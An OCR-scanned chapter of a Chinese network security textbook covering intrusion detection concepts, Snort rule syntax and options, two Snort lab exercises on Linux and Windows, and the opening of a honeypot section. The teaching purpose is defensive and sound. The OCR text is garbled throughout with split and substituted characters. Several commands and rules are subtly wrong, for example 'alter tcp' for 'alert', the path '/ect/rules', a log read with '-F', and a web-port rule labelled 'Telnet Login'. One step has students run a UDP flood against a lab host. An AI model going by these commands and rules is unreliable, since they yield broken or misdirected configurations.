卡 设 为 混杂 模式 (以 便 捕 获 数据 包 ) ,实时 接收 和 分 析 网 络 中 流动 的 数据 包 ,从 而 检测 是 否 存 
在 人 侵 行为 。 一 旦 检测 到 了 攻击 行为 ,NIDS 响应 模块 就 提供 多 种 选项 以 通知 .报警 并 对 攻 
击 采 取 响 应 。NIDS 尤其 适用 于 大 规模 网 络 的 人 侵 检测 可 扩展 体系 结构 .知识 处 理 过 程 和 
海量 数据 处 理 技术 等 。 


6.1.3 入 侵 检 测 技术 


入侵 检测 系统 的 检测 分 析 技 术 主 要 分 为 两 大 类 : 异常 检测 和 误 用 检测 。 

异常 检测 技术 也 称 为 基于 行为 的 检测 技术 ,是 指 根据 用 户 的 行为 和 系统 资源 的 使 用 状 
况 判 断 是 否 存 在 网 络 人 侵 。 

误 用 检测 技术 也 称 为 基于 知识 的 检测 技术 或 者 模式 匹配 检测 技术 , 它 的 前 提 是 假设 所 
有 的 网 络 攻击 行为 和 方法 都 具有 一 定 的 模式 或 特征 ,如 果 把 以 往 发 现 的 所 有 网 络 攻击 的 特 
征 总 结 出 来 并 建立 一 个 人 侵 信息 库 , 那 么 人 侵 检 测 系统 可 以 将 当时 捕获 到 的 网 络 行为 特征 
与 人 侵 信息 库 中 的 特征 信息 相 比较 ,如 果 匹 配 , 则 当前 行为 就 被 认定 为 入侵 行为 。 

无 论 哪 种 和 人 侵 检测 技术 都 需要 搜集 总 结 有 关 网 络 信 侵 行为 的 各 种 知识 或 者 系统 及 其 用 
户 的 各 种 行为 的 知识 。 

人 侵 检测 系统 包括 3 个 功能 部 件 : 信息 收集 .信息 分 析 、 结 果 处 理 。 

1. 信息 收集 

人 侵 检测 的 第 一 步 是 信息 收集 ,收集 内 容 包括 系统 .网 络 .数据 及 用 户 活 动 的 状态 和 行 
为 ,需要 在 计算 机 网 络 系统 中 的 若干 不 同 关键 点 (不 同 网 段 和 不 同 主机 ) 收 集 信息 。 从 一 个 
来 源 的 信息 有 可 能 看 不 出 疑点 ,因此 要 尽 可 能 扩大 检测 范围 。 入 侵 检测 很 大 程度 上 依赖 于 
收集 信息 的 可 靠 性 和 正确 性 ,要 保证 用 来 检测 网 络 系统 的 软件 的 完整 性 ,特别 是 入 侵 检测 系 
统 软件 本 身 应 具有 相当 强 的 坚固 性 ,防止 被 自 改 而 收集 到 错误 的 信息 。 

网 络 入 侵 检测 系统 可 能 会 将 大 量 的 数据 传 回 分 析 系 统 中 ,在 一 些 系 统 中 监听 特定 的 数 
据 包 会 产生 大 量 的 分 析 数 据 流量 。 

信息 收集 的 来 源 包括 系统 或 网 络 的 日 志文 件 、 网 络 流量 、 系 统 目 录 和 文件 的 异常 变化 、 
程序 执行 中 的 异常 行为 等 。 

2. 信息 分 析 

信息 分 析 一 般 采 用 以 下 3 种 方法 。 

(1) 模式 匹配 : 将 收集 到 的 信息 与 已 知 的 网 络 人 侵 和 系统 误 用 模式 数据 库 进 行 比较 ， 
从 而 发 现 违背 安全 策略 的 行为 。 
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(2) 统计 分 析 : 该 方法 首先 给 系统 对 象 (如 用 户 .文件 .目录 和 设备 等 ) 创 建 一 个 统计 描 
述 , 统 计 正 常 使 用 时 的 一 些 测 量 属性 (如 访问 次 数 、 操 作 失败 次 数 和 延 时 等 ) 。 

(3) 完整 性 分 析 : 往往 用 于 事后 分 析 。 

3. 结果 处 理 

控制 台 按照 告警 ,根据 预先 定义 的 响应 采取 相应 的 措施 ,可 以 是 重新 配置 路 由 器 或 防火 
墙 ` 终 止 进程 .切断 连接 改变 文件 属性 ,也 可 以 只 是 简单 地 告警 。 


6.1.4 入 侵 检 测 技术 的 特点 和 发 展 趋势 


入 侵 检 测 系统 通过 分 析 网 络 中 的 传输 数据 来 判断 破坏 系统 和 入 侵 事 件 。 通 过 分 析 用 户 
的 活动 ,判断 入 侵 事 件 的 类 型 ,检测 非法 的 网 络 行为 .对 异常 的 网 络 流量 进行 报警 。 基 于 网 
络 的 入侵 检测 系统 具有 检测 速度 快 、 隐 蔽 性 好 、 视 野 更 宽 、 监 测 器 较 少 、 占 资源 少 的 特点 。 基 
于 主机 的 入 侵 检测 系统 具有 视野 集中 、 易 于 用 户 自 定义 、 保 护 更 加 周密 、 对 网 络 流量 不 敏感 
的 特点 。 

采用 当前 的 分 析 技术 和 模型 会 产生 大 量 的 误 报 和 漏 报 , 难 以 确定 真正 的 入 侵 行 为 。 目 
前 新 的 分 析 技术 是 采用 协议 分 析 和 行为 分 析 , 可 极 大 地 提高 检测 效率 和 准确 性 ,从 而 对 真正 
的 攻击 做 出 反应 。 

协议 分 析 是 目前 最 先进 的 检测 技术 ,其 功能 是 利用 协议 的 高 规则 性 来 辨别 数据 包 的 协 
议 类 型 ,以 便 使 用 相应 的 数据 分 析 程 序 来 检测 数据 包 , 以 此 识别 人 侵 企 图 和 行为 。 主 要 技术 
包含 协议 解码 .数据 重组 、 命 令 解析 等 , 比 模式 匹配 检测 效率 更 高 ,并 能 对 一 些 未 知 的 攻击 特 
征 进行 识别 ,具有 一 定 的 免疫 功能 。 如 何 让 入 侵 检测 系统 能 够 读 懂 协 议 是 其 关键 ,例如 数据 
包 的 不 同位 置 所 代表 的 内 容 , 并 且 准确 判断 出 这 些 内 容 的 真实 含义 。 协 议 分 析 技术 提高 了 
性 能 和 准确 性 ,系统 资源 开销 小 ,是 入 侵 检 测 技术 发 展 的 趋势 。 


6.1.5 部 署 入 侵 检 测 


人 侵 检测 部 署 工 作 包 括 对 网 络 入 侵 检测 和 主机 入 侵 检 测 等 不 同类 型 人 侵 检测 系统 的 部 
署 规划 。 根 据 所 掌握 的 网 络 检测 和 安全 需求 ,选取 合适 的 和 人 侵 检测 系统 。 基 于 网 络 的 入侵 
检测 系统 可 以 在 网 络 的 多 个 位 置 进 行 部 署 ,以 确保 每 个 人 侵 检测 系统 都 能 够 在 相应 部 署 点 
上 发 挥 作用 ,共同 防护 ,保障 网 络 的 安全 运行 为 原则 。 根 据 入 侵 检测 部 署 位 置 的 不 同 , 和 侵 
检测 系统 具有 不 同 的 工作 特点 。 需 要 根据 自己 的 网 络 环境 以 及 安全 需求 进行 网 络 部 署 ,以 
满足 预定 的 网 络 安全 需求 。 在 基于 网 络 的 和 人 侵 检 测 系统 部 署 并 配置 完成 后 ,基于 主机 的 人 
侵 检测 系统 的 部 署 可 以 给 系统 提供 高 级 别 的 保护 。 一 般 入 侵 检测 的 部 署 点 可 以 划分 为 
DMZ 区 外 网 人口 .内 网 主干 等 ,IDS 不 同 于 防火 墙 ,入 侵 检测 系统 是 一 个 监听 设备 ,没有 跨 
接 在 任何 链 路 上 ,无 须 网 络 流量 流 经 它 便 可 以 工作 。 对 IDS 的 部 署 ,唯一 的 要 求 是 IDS 应 
当 挂 接 在 所 有 所 关注 的 流量 都 必须 流 经 的 链 路 上 .如 图 6-1 所 示 。 

实验 6-1 入 侵 检测 实验 

【实验 目的 】 

(1) 通过 实验 掌握 Snort 工作 原理 和 工作 方式 。 

(2) 熟悉 Snort 规则 的 编写 。 
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区 


DMZ 区 入 侵 检测 
到 


图 6-1 入 侵 检 测 系统 的 部 署 


【实验 原理 】 

Snort 是 一 个 强大 的 网 络 人 侵 检 测 系 统 。 它 拥有 3 个 基本 模式 : 嗅 探 器 ,数据 包 记 录 器 
和 入侵 检测 。 嗅 探 器 模式 仅 从 网 络 上 读 取 数据 包 并 作为 连续 不 断 的 流 显示 在 终端 上 ,常用 
命令 为 snortrdev。 数 据 包 记录 器 模式 是 把 数据 包 记 录 到 硬盘 上 ,常用 命令 snortrb。 网 络 人 
侵 检测 模式 是 最 复杂 的 ,而 且 是 可 配置 的 。 可 以 让 Snort 分 析 网 络 数据 流 以 匹配 用 户 定义 
的 一 些 规则 ,并 根据 检测 结果 采取 一 定 的 动作 。 

Snort 使 用 一 种 简单 的 规则 描述 语言 ,这 种 描述 语言 易于 扩展 ,功能 强大 。 其 规则 是 基 
于 文本 的 ,规则 文件 按照 不 同 的 组 进行 分 类 。 例 如 ,文件 ftp. rules 包含 了 FTP 攻击 内 容 。 
Snort 的 每 条 规则 必须 在 一 行 中 , 它 的 规则 解释 器 无 法 对 跨行 的 规则 进行 解析 。 

Snort 的 每 条 规则 都 可 以 分 成 逻辑 上 的 两 个 部 分 : 规则 头 和 规则 体 。 

规则 头 包括 4 个 部 分 : 规则 动作 、 协 议 、 源 信息 、 目 的 信息 。 

Snort 预 置 的 规则 动作 有 5 种 : 

(1) pass: 忽略 当前 的 包 , 后 续 捕 获 的 包 将 被 继续 分 析 。 

(2) log: 按照 自己 配置 的 格式 记录 包 。 

(3) alert: 按照 自己 配置 的 格式 记录 包 , 然 后 进行 报警 。 它 的 功能 强大 ,但 是 必须 恰当 
地 使 用 ,如 果 报 警 记 录 过 多 ,从 中 抽取 有 效 信息 的 工作 量 增 大 ,反而 会 使 安全 防护 工作 变 得 
低 效 。 

(4) dynamic: 是 比较 独特 的 一 种 , 它 保持 在 一 种 潜伏 状态 ,直到 activate 类 型 的 规则 将 
其 触发 ,之 后 它 将 像 log 动作 一 样 记录 数据 包 。 

(5) activate: 功能 强大 , 当 被 规则 触发 时 生成 报警 ,并 启动 相关 的 dynamic 类 型 规则 。 
在 检测 复杂 的 攻击 或 对 数据 进行 归 类 时 ,该 动作 选项 相当 有 用 。 

除了 以 上 5 种 预 置 的 规则 动作 类 型 ,还 可 以 定制 自己 的 类 型 。 

规则 体 的 作用 是 在 规则 头 信 息 的 基础 上 进一步 作 分 析 , 有 了 它 才 能 确认 复杂 的 攻击 
(Snort 的 规则 定义 中 可 以 没有 规则 体 ) 。 规 则 体 由 若干 个 被 分 隔 开 的 片断 组 成 ,每 个 片断 
定义 了 一 个 选项 和 相应 的 选项 值 。 一 部 分 选项 是 对 各 种 协议 的 详细 说 明 , 包 括 IP ICMP 和 
TCP 协议 ,其 余 的 选项 是 规则 触发 时 提供 给 管理 员 的 参考 信息 ,被 搜索 的 关键 字 、Snort 规 
则 的 标识 和 大 小 写 不 敏感 选项 。 

其 中 : 
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。 alert 表示 规则 动作 为 报警 。 

。 tcp 表示 协议 类 型 为 TCP 协议 。 

。 1192. 168. 1. 1/24 表示 源 IP 地 址 不 是 192. 168. 1. 1/24。 

。 第 一 个 any 表示 源 端口 为 任意 端口 。 

。 -二 表示 发 送 方向 。 

。 第 二 个 any 表示 目的 IP 地 址 为 任意 IP 地 址 。 

。 21 表示 目的 端口 为 21。 

。 content: "USER" 表 示 匹 配 的 字符 串 为 USER。 

。 msg: "FTPLogin" 表 示 报 警 信 息 为 FTPLogin。 

方向 操作 符 -二 表示 数据 包 的 流向 。 它 左边 的 数据 包 分 别 是 源 地 址 和 源 端口 、 目 的 地 址 
和 目的 端口 。 此 外 ,还 有 一 个 双向 操作 符 志 > , 它 使 Snort 对 这 条 规则 中 两 个 IP 地 址 /端口 
之 间 的 数据 传输 进行 记录 /分 析 , 例 如 Telnet 或 者 POP3 对 话 。 

activate/ dynamic 规则 对 扩展 了 snort 功能 。 使 用 activate/dynamic 规则 对 ,能 够 使 用 
一 条 规则 激活 另 一 条 规则 。 当 一 条 特定 的 规则 启动 ,如 果 要 snort 接着 对 符合 条 件 的 数据 
包 进 行 记 录 时 ,使 用 activate/dynamic 规则 对 最 为 方便 。 除 了 一 个 必需 的 选项 activates 外 ， 
激活 规则 非常 类 似 于 报警 规则 (alert) 。 动 态 规则 (dynamic) 和 日 志 规 则 (log) 也 很 相似 ,不 
过 它 需 要 一 个 选项 : activated_by。 动 态 规则 还 需要 另 一 个 选项 : count , 当 一 个 激活 规则 局 
动 时 , 它 就 打开 由 activate/activated_by 选项 之 后 的 数字 指示 的 动态 规则 ,记录 count 个 数 
据 包 。 

Snort 采用 命令 行 方式 运行 。 格 式 为 


snort- [options]< filters> 


其 中 ,options 为 选项 参数 ,filters 为 过 滤器 。 

Snort 主要 选项 参数 如 下 : 

-A=alert> 设置 报警 方式 为 full fast 或 者 none。 在 full 方式 下 ,snort 将 传统 
的 报警 信息 格式 写 和 人 报警 文件 ,报警 内 容 比 较 详细 。 在 fast 方式 
下 ,snort 只 将 报警 时 间 报警 内 容 、 报 警 IP 地 址 和 端口 号 写 人 文件 。 
在 none 方式 下 ,系统 将 关闭 报警 功能 。 

-a 显示 ARP 包 。 

市 以 tcpdump 的 格式 将 数据 包 记 入 日 志 。 所 有 的 数据 包 将 以 二 进 制 
格式 记录 到 snort. log 文件 中 。 这 个 选项 提高 了 Snort 的 操作 速度 ， 
因为 直接 以 二 进 制 存 储 , 省 略 了 转换 为 文本 文件 的 时 间 , 通 过 -b 选 
项 的 设置 ,Snort 可 以 在 100Mb/s 的 网 络 环境 中 正常 工作 。 
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-c<cf> 使 用 配置 文件 二 cf 二 。 文件 内 容 主 要 控制 系统 哪些 包 需 要 记 入 日 
志 , 哪 些 包 需 要 报警 ,哪些 包 可 以 忽略 等 。 

已 仅 抓 取 包 中 的 ASCII 字符 。 

-d 抓 取 应 用 层 的 数据 包 。 

-BD 在 守护 模式 下 运行 Snort。 

-e 显示 和 记录 数据 链 路 层 信 息 。 
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-F<bp{> 从 文件 二 bpf 二 中 读 取 BPF 过 滤 信息 。 

-h<hn> 设置 二 hn>(C 类 IP 地 址 ) 为 内 部 网 络 。 当 使 用 这 个 开关 时 ,所 有 来 
自 外 部 的 流量 将 会 有 一 个 右 箭头 ,所 有 来 自 内 部 的 流量 将 会 有 一 个 
左 箭头 。 这 个 选项 没有 太 大 的 作用 ,但 是 可 以 使 显示 的 包 的 信息 格 


式 比较 容易 察看 。 

< 使 用 网 络 接口 文件 一 if 。 

-1 将 包 信 息 记 录 到 目录 二 ld 之 下 。 设 置 日 志 记录 的 分 层 目录 结构 , 按 
接收 包 的 IP 地 址 将 抓 取 的 包 存 储 在 相应 的 目录 下 。 

-n<num> 处 理 完 二 num 放 包 后 退出 。 

-N 关闭 日 志 功 能 ,报警 功能 仍然 工作 。 

-Pp 关闭 混杂 模式 的 嗅 探 (sniffing)。 这 个 选项 在 网 络 严重 拥塞 时 十 分 
有 效 。 

-r<t> 读 取 tcpdump 生成 的 文件 二 tf 二 ,Snort 将 读 取 和 处 理 这 个 文件 。 

-S 将 报警 信息 记录 到 系统 日 志 , 日志 文件 可 以 出 现在 /var/log/ 
messages 目录 里 。 

-Y 将 包 信息 显示 到 终端 时 ,采用 详细 模式 。 这 种 模式 存在 一 个 问题 : 


它 的 显示 速度 比较 慢 , 如 果 是 在 IDS 网 络 中 使 用 Snort ,最 好 不 要 采 
用 详细 模式 ,否则 会 丢失 部 分 包 信息 。 


-V 显示 版 本 号 并 退出 。 
【实验 环境 】 

Linux 系统 。 实 际 系 统 是 :版 本 是 
【实验 内 容 】 


按 要 求 操作 ,构造 实验 环境 , 贴 出 截图 , 标 出 关键 信息 ,简要 说 明 。 实 验 前 要 安装 


Snort。 打 开 Linux 系统 的 终端 。 命 令 如 下 : 


sudo apt- get install snort 


(1) Snort 数据 包 嗅 探 。 
启动 Snort, 进 入 实验 平台 , 单 击 工具 栏 “ 控 制 台 ”按钮 ,进入 IDS 工作 目录 ,运行 Snort 


对 网 络 接口 eth0 进行 监听 ,要 求 : 


@ 仅 捕 获 同 组 主机 发 出 的 ICMP 回 显 请 求 数据 包 。 
@ 采用 详细 模式 在 终端 显示 数据 包 链 路 层 .应 用 层 信息 。 
@ 对 捕获 信息 进行 日 志 记录 ,日 志 目 录 为 /var/log/snort。 命 令 如 下 : 


snort -i eth0 -dev icmp and src 192.168.1.10 -1 /var/log/snort 


(2) 查看 Snort 日 志 记 录 。 
默认 Snort 日 志 记 录 最 后 一 级 目录 会 以 触发 数据 包 的 源 IP 命名 。 可 使 用 组 合 键 


Ctrl 十 C 停止 Snort 运行 。 主 要 记录 的 数据 包括 运行 时 间 、 内 存 使 用 情况 、 数 据 包 数 量 等 。 


(3) Snort 数据 包 记 录 。 
@ 对 网 络 接口 eth0 进行 监听 , 仅 捕 获 同 组 主机 发 出 的 Telnet 请 求 数据 包 , 并 将 捕获 的 


数据 包 以 二 进 制 方式 存储 到 日 志文 件 /var/log/snort/snort. log 中 。 命 令 如 下 : 
。 186 。 


snort -i eth0 -b tcp and src 192.168.1.10 and dst port 23 


@ 当前 主机 执行 上 述 命 令 , 同 组 主机 telnet 远程 登录 当前 主机 。 
@@ 停止 Snort 捕获 (Ctrl 十 C 键 ) , 读 取 snort. log 文件 ,查看 数据 包 内 容 。 命 令 如 下 : 


snort -F /var/log/snort .log 


(4) 简单 报警 规则 。 

Oa 在 snort 规则 集 目 录 ids/rules 下 新 建 snort 规则 集 文件 new. rules ,对 来 自 外 部 主机 
的 .目标 为 当前 主机 80/TCP 端口 的 请 求 数据 包 进 行 报警 ,报警 消息 自 定义 。 

新 建 Snort 规则 集 文 件 new. rule 命令 : 


cd /ect/rules 


sudo touch new.rule 
snort 规则 : 
alter tcp any any ->192.168.1.10 80 (msg:"Telnet Login") 


@ 编辑 snort. conf 配置 文件 ,使 其 包含 new. rules 规则 集 文件 ,具体 操作 如 下 : 使 用 
vim( 或 vi) 编辑 器 打开 snort. conf ,切换 至 编辑 模式 ,在 最 后 添加 新 行 包 含 规则 集 文件 new. 
rules。 


添加 包含 new. rules 规则 集 文件 语句 
include &RULE PATH/new.rules 


@ 以 入 侵 检测 方式 启动 snort, 进 行 监听 。 
先 输入 snort. conf 的 目录 /etc/snort/ ,再 输入 以 下 命令 


snort -~c snort.conf 


以 入 侵 检测 方式 启动 snort, 同 组 主机 访问 当前 主机 Web 服务 。 

实验 6-2 入侵 检 测 系统 实验 

【实验 目的 】 

(1) 通过 实验 深入 理解 人 侵 检测 系统 的 原理 和 工作 方式 。 

(2) 熟悉 入 侵 检 测 工具 Snort 在 Windows 操作 系统 中 的 安装 和 配置 方法 。 

【实验 环境 】 

硬件 : 局 域 网 内 联网 的 两 台 主 机 。 其 中 一 台 为 Windows 操作 系统 主机 ,用 作 安 装 入 侵 
检测 系统 ; 另 一 台 为 入 侵 主 机 。 

软件 : Apache、PHP、MySQL.、 Snort、Adodb、Acid、JpGrapg、WinPcap 等 软件 的 安 
装 包 。 
【实验 步骤 】 
分 析 : 
(1) Snort 具有 实时 数据 流量 分 析 和 IP 数据 包 日 志 分 析 的 能 力 , 具 有 跨 平台 特征 ,能 够 
进行 协议 分 析 和 对 内 容 的 搜索 /匹配 。 它 能 够 检测 不 同 的 攻击 行为 ,如 缓冲 区 溢出 、 端 口 扫 
描 、DoS 攻击 等 ,并 进行 实时 报警 。 
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(2) Snort 在 运行 时 ,需要 通过 一 些 插件 协同 工作 ,才能 发 挥 其 强大 的 功能 。 所 以 在 部 
署 时 要 选择 合适 的 数据 库 、Web 服务 器 、 图 形 处 理 程序 软件 及 版 本 。 实 验 涉及 的 这 些 软件 


的 主要 作用 如 下 : 
Acid 基于 PHP 的 人 侵 检测 数据 库 分 析 控 制 台 。 
Adodb 为 PHP 提供 统一 的 数据 库 连 接 函 数 。 
Apache Windows 版 本 的 Apache Web 服务 器 。 
JpGraph PHP 所 用 的 图 形 库 。 
MySQL Windows 版 本 的 MySQL 数据 库 , 用 于 存储 Snort 的 日 志 、 报 警 、 权 
限 等 。 
PHP Windows 环境 中 的 PHP 支持 环境 。 
Snort Windows 中 的 Snort 安装 包 , 人 侵 检测 的 核心 部 分 。 
WinPcap 网 络 数据 包 截 取 驱 动 程序 ,用 于 从 网 卡 中 抓 取 数 据 包 。 
snortrules 提供 拦截 数据 包 的 规则 。 
Snort 入 侵 检测 软件 。 


这 些 软件 需要 自行 到 相关 网 站 下 载 (建议 在 官网 下 载 )。 

(3) 实验 分 两 大 步骤 : 部 署 实验 环境 ;Snort 实验 测试 。 

部 署 实验 环境 主要 是 安装 与 Snort 协同 工作 的 软件 (插件 ) ,同时 还 需 编写 Snort 规则 。 
编写 Snort 规则 时 ,大 多 数 规则 都 写 在 一 个 单行 上 ,或 都 在 多 行 之 间 的 行 尾 用 /分 隔 。Snort 
被 分 成 两 个 逻辑 部 分 : 规则 头 和 规则 项 。 规 则 头 包 含 规则 的 动作 ,协议 、 源 和 目标 IP 地 址 
与 网 络 掩 码 ,以 及 源 和 目标 端口 信息 ;规则 选项 部 分 包含 报警 消息 内 容 和 要 检查 的 包 的 
部 分 。 

Snort 实验 测试 可 以 刻意 通过 入 侵 来 检验 。 

第 1 部 分 部 署 实 验 环境 

步骤 1 安装 Apache。 

(1) 将 Apache 安装 在 默认 文件 夹 C:\apache 下 ,将 配置 文件 httpd. conf 中 的 Listen 
8080 更 改 为 Listen 50080。 

思考 为 什么 要 作 这 样 的 更 改 ? 

(2) 将 Apache 设置 为 以 Windows 中 的 服务 方式 运行 。 

请 写 出 设置 方法 。 

步骤 2 安装 PHP。 

(1) 将 原 安 装 包 解 压 至 C:\php。 

(2) C;\php 下 php4ts. dll 复制 到 %systemroot%\system32, 将 php. ini-dist 复制 到 
%systemroot%\ 文 件 夹 下 ,并 更 名 为 php. ini。 

(3) 添加 gb 图 形 库 支持 ,在 php. ini 中 添加 extension 二 php_gd2. dll。 如 果 php.ini 有 
该 句 , 将 此 语句 前 面 的 ;” 注 释 符 去 掉 。 

(4) 添加 Apache 对 PHP 的 支持 。 

请 写 出 添加 方法 。 

(5) 在 Windows 中 启动 Apache Web 服务 。 

请 写 出 启动 命令 。 
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(6) 在 C: \apache\apache2\htdocs 目录 下 新 建 test. php 测试 文件 ,其 内 容 为 
? phpinfo();? 过 ;测试 PHP 是否 成 功 安装 。 请 贴 出 安装 成 功 的 截图 。 

步骤 3 安装 Snort。 

修改 Snort 配置 文件 。 

(1) 打开 C:/snort/etc/snort. conf 配置 文件 。 

(2) 设置 snort 内 、 外 网 检测 范围 。 

将 snort. conf 文件 中 var HOME_NET any 语句 中 的 any 改 为 自己 所 在 的 子 网 地 址 ， 
即将 Snort 监测 的 内 网 设置 为 本 机 所 在 局 域 网 。 例 如 本 地 IP 为 192. 168. 1. 10, 则 将 any 改 
为 192. 168. 1. 0/24 ,并 将 var EXTERNAL_NET any 语句 中 的 any 改 为 !192. 168. 1. 0/24， 
即将 Snort 监测 的 外 网 改 为 本 机 所 在 局 域 网 以 外 的 网 络 。 

(3) 设置 监测 包含 的 规则 。 

在 snort. conf 文件 中 描述 规则 的 部 分 ,前 面 加 # 表示 该 规则 没有 启用 ,将 local. rules 之 
前 的 # 号 去 掉 ,其 余 规则 保持 不 变 。 

步骤 4 安装 配置 MySQL 数据 库 。 

(1) 安装 MySQL 到 默认 文件 夹 C:\mysql, 并 使 MySQL 在 Windows 中 以 服务 形式 
运行 。 


实现 方式 : 在 命令 行 方式 下 进入 C:\mysql\bin, 输 入 


A 


c:\mysql\bin\mysqld -nt -install 


(2) 启动 MySQL 服务 。 
实现 方式 : 在 命令 行 方式 下 输入 


net start mysql 


(3) 以 root 用 户 ( 上 默认 无 密码 ) 登 录 MySQL 数据 库 ,采用 create 命令 ,建立 Snort 运行 
必需 的 snort 数据 库 和 snort_archive 数据 库 。 
实现 方式 : 在 MySQL 提示 符 后 输入 


mysql> create database snort; 


mysql> create database snort archive; 


特别 注意 : 在 输入 分 号 后 MySQL 才 会 编译 执行 语句 。 

(4) 退出 MySQL 后 ,使 用 mysql 命令 在 snort 数据 库 和 snort_archive 数据 库 中 建立 
Snort 运行 必需 的 数据 表 。 

实现 方式 : 退出 MySQL 后 ,在 出 现 的 提示 符 之 后 输入 


mysql -D snort -~u root -p<c:\snort\contrib\create mysql 


c:\mysql\bin>mysql -D snort archive ~u root ~-p <c:\snort\contrib\create mysql 
注意 : 以 此 形式 输入 的 命令 后 没有 分 号 。 
(5) 再 次 以 root 用 户 登 录 MySQL 数据 库 ,在 本 地 数据 库 中 建立 acid( 密 码 为 acidtest) 
和 snort( 密 码 为 snorttest) 两 个 用 户 , 以 备 后 用 。 
在 提示 符 后 输入 下 面 的 语句 : 
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mysql>grant usage on * .* to "acid"@ "localhost" identified by "acidtest"; 


mysql> grant usage on * .* to "snort"@ "localhost" identified by "snorttest"; 


(6) 为 新 建 用 户 在 snort 和 snort_archive 数据 库 中 分 配 权限 。 
在 mysql 提示 符 后 输入 下 面 的 语句 : 


mysql> grant select, insert,update, delete, create,alter on snort .* to "acid"@ 
"localhost"; 

mysql> grant select,insert on snort .* to "snort"@ "localhost"; 

mysql> grant select, insert, update, delete, create,alter on snort archive .* to 


"acid"@ "localhost"; 


步骤 5 安装 Adodb。 

步骤 6 安装 配置 数据 控制 台 Acid。 

(1) 解压 缩 Acid 软件 包 至 C: \apache\apache2\htdocs\acid 目录 下 。 
(2) 修改 acid 目录 下 的 acid_conf. php 配置 文件 。 


$ DBlib path ="c:\php\adodb"; 
$ DBtype ="mysql"; 
$alert dbname ="snort"; 

$alert host ="localhost"; 
$alert port ="3306"; 

$alert user ="acid"; 

$alert password ="acidtest"; 


/* Archive DB connection parameters */ 


0D 


$archive dbname "snort archive"; 


$archive host ="]localhost"; 

$archive port ="3306"; 

$archive user ="acid"; 

$archive password ="acidtest"; 

$ ChartLib path c:\php\jpgraph\src"; 


注意 : 修改 时 要 将 文件 中 原来 的 对 应 内 容 注 释 掉 或 者 直接 履 盖 。 

(3) 查看 http ://127. 0.0.1:50080/acid/acid_db_setup. php 网 页 ,按照 系统 提示 建立 
数据 库 。 

单 击 Create ACID AG 建立 数据 库 。 

步 又 7 安装 JpGrapg 库 。 

安装 后 ,修改 C:\php\jpgragh\src 下 jpgragh. php 文件 ,去 掉 下 面 语句 的 注释 : 


DEFINE ("CACHE DIR", "/tmp/jpgraph cache/"); 


步骤 8 安装 WinPcap。 
步骤 9 配置 并 启动 Snort。 
(1) 指定 snort. conf 配置 文件 中 classification. config ,reference. config 两 个 文件 的 绝 
对 路 径 。 
修改 命令 : 
。 190 。 


incluqde c:\snort\etc\classification.config 


incluqe c:\snort\etc\reference.config 


(2) 在 文件 中 添加 语句 指定 默认 数据 库 、 用 户 名 、 主 机 名 、 密 码 .数据 库 用 户 等 。 
在 该 文件 的 最 后 加 入 下 面 的 语句 : 


output database: alert, mysql, host= localhost user= snort password= snorttest dbname= snort 


encoding=hex detail=full 
(3) 输入 命令 启动 Snort。 


c:\>cd snort\bin; 


Cc:\snort\bin> snort -c "c:\snort\etc\snort.conf" -1 "c:\snort\log" -d-e -x 

请 贴 出 正常 运行 的 截图 。 

(4) 打开 http://localhost:50080/acid/acid_main. php 网 页 ,进入 Acid 分 析 控 制 台 主 
界面 ,检查 配置 是 否 正确 。 

请 贴 出 正常 运行 的 截图 。 

第 2 部 分 Snort 实验 测试 

步骤 1 使 用 控制 台 查看 检测 结果 。 

(1) 启动 Snort 并 打开 Acid 的 检测 控制 台 主 界面 。 

打开 http://127.0.0.1:50080/acid/acid_main. php 网 页 ,启动 Snort 并 打开 Acid 检测 
控制 台 主 界面 。 

(2) 单 击 右 侧 图 示 中 TCP 后 的 数字 80% ,将 显示 所 有 检测 到 的 TCP 协议 日 志 的 详细 
情况 。 请 给 予 分 析 。 

(3) 选择 控制 条 中 的 home 返回 控制 台 主 界面 ,查看 流量 分 类 和 分 析 记 录 。 

(4) 选择 last 24 hours:alertsunique, 可 以 看 到 24 小 时 内 特殊 流量 的 分 类 记录 和 分 析 。 

步骤 2 配置 Snort 规则 。 

(1) 添加 规则 ,以 对 符合 此 规则 的 数据 包 进 行 检测 。 例 如 ,添加 实现 对 内 网 的 UDP 协 
议 相关 流量 进行 检测 并 报警 的 规则 。 

打开 C:\snort\rules\local. rules 文件 .加 入 实验 要 求 的 规则 : 


[uy 


alert udp any any <> $ HOME_ NET any (msg:"udp ids/dns- version- query";content: 


"version";) 


(2) 重启 Snort 和 Acid 检测 控制 台 , 使 规则 生效 。 

步骤 3 实验 测试 。 

(1) 启用 Wireshark ,监控 数据 包 。 

(2) 在 另外 一 台 计 算 机 使 用 UDP flood 工具 对 本 机 进行 攻击 ,查看 UDP 协议 流量 的 日 
志 记 录 。 

(3) 结合 数据 包 的 监控 以 及 UDP 协议 流量 日 志 记 录 ,分 析 实 验 结果 。 

(4) 编写 检测 规则 文件 mytelnet. rules, 记 录 局 域 网 内 机 器 对 本 机 的 Telnet 连接 企图 ， 
并 发 出 警告 ,将 此 规则 文件 添加 到 设置 文件 中 ,并 测试 规则 是 否 生效 , 写 出 详细 的 设置 步 又 
和 测试 结果 。 
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【实验 思考 】 

(1) 编写 一 个 规则 ,通过 捕捉 关键 字 Search 记录 打开 Google 网 页 的 动作 ,并 将 符合 规 
则 的 数据 包 输 出 到 Alert 文件 中 。 

(2) 熟悉 Snort 规则 ,尝试 定义 更 为 实用 的 规则 ,并 检验 其 效果 。 


6.2 蜜 饶 技术 


6.2.1 密 钠 定义 


蜜 钠 (honeypot) 的 思想 最 早 是 由 Clifford Stoll 于 1988 年 提出 来 的 ,其 构想 是 : 在 跟踪 
黑客 的 过 程 中 ,利用 一 些 包 含 虚假 信息 的 文件 作为 黑客 “ 诱 乌 "来 检测 和 人 侵 。 蜜 钠 正 式 出 现 
是 Bill Cheswick 采用 服务 仿真 和 漏洞 仿真 技术 来 吸引 黑客 。 服 务 仿 真 技术 是 蜜 钠 作为 应 
用 层 程序 打开 一 些 常 用 服务 端口 监听 ,仿效 实际 服务 器 软件 的 行为 响应 黑客 请 求 。 漏 洞 仿 
真是 指 返回 黑客 的 响应 信息 会 使 黑客 认为 该 服务 器 上 存在 某 种 漏洞 ,从 而 引诱 黑客 继续 攻 
击 。 蜜 钠 可 以 仅仅 是 一 个 对 其 他 系统 和 应 用 的 仿真 ,可 以 创建 一 个 监禁 环境 将 攻击 者 困 在 
其 中 ,还 可 以 是 一 个 产品 系统 。 

蜜 饶 的 另 一 个 用 途 是 拖延 攻击 者 对 真正 目标 的 攻击 ,让 攻击 者 在 蜜 缸 上 浪费 时 间 ,同时 
